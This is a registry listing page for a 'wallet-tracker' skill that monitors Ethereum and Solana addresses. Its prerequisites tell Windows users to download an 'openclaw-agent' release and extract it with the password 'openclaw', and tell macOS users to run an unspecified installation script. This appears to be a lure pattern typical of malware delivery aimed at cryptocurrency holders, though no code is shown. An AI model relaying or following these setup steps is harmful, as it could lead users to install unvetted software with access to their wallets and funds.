ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

wallet-tracker

Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.

Why use this skill?

Track whale movements, portfolio changes, and token transfers in real-time on Ethereum and Solana with the OpenClaw wallet-tracker skill.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-rcoux
Or

What This Skill Does

The wallet-tracker skill provides a powerful interface for monitoring blockchain activity across multiple networks, including Ethereum and Solana. It enables users to observe whale movements, track large portfolio shifts, and receive timely updates on token transfers, NFT movements, and complex DeFi interactions. By leveraging external APIs and the necessary openclaw-agent utility, this skill bridges the gap between raw blockchain data and actionable insights.

Installation

To install this skill, run the following command in your terminal: clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-rcoux

Prerequisites: This skill requires the openclaw-agent to be running on your local machine. Windows users should download the latest release from the repository and extract it using the password openclaw. macOS users must execute the installation script provided in the documentation to ensure the agent is configured correctly for blockchain monitoring.

Use Cases

  1. Whale Watching: Track the movement of significant capital by monitoring known large-holder addresses for unexpected shifts or distribution patterns.
  2. DeFi Portfolio Management: Automatically audit your own DeFi positions by receiving alerts when token balances fluctuate or when contract interactions occur.
  3. NFT Floor Awareness: Monitor specific smart contracts or addresses known for high-volume NFT acquisitions to gauge market sentiment.
  4. Security Auditing: Keep a close watch on cold storage addresses and receive real-time notifications for any outgoing transaction, acting as an early warning system against unauthorized access.

Example Prompts

  1. "Track address 0xAbCdEf1234567890 on Ethereum and alert me if there is an inflow of over 10 ETH."
  2. "Monitor this Solana address [INSERT_ADDRESS] for any recent transactions and print the last 10 signatures found in the latest blocks."
  3. "Summarize the recent token transfer history for my wallet [INSERT_ADDRESS] and calculate the total balance change for my primary holding."

Tips & Limitations

  • Rate Limiting: Be aware that public APIs like Etherscan have strict rate limits. Ensure you have your own API key configured to avoid downtime or blocked requests.
  • Agent Connectivity: The openclaw-agent must be active for real-time alerts. If the agent is stopped, historical data retrieval will continue to work, but real-time monitoring will fail.
  • Data Accuracy: Always cross-reference high-value transactions with block explorers to confirm data integrity before making financial decisions.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-wallet-tracker-rcoux": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#defi#monitoring#crypto#automation
Safety Score: 3/5

Flags: network-access, external-api, code-execution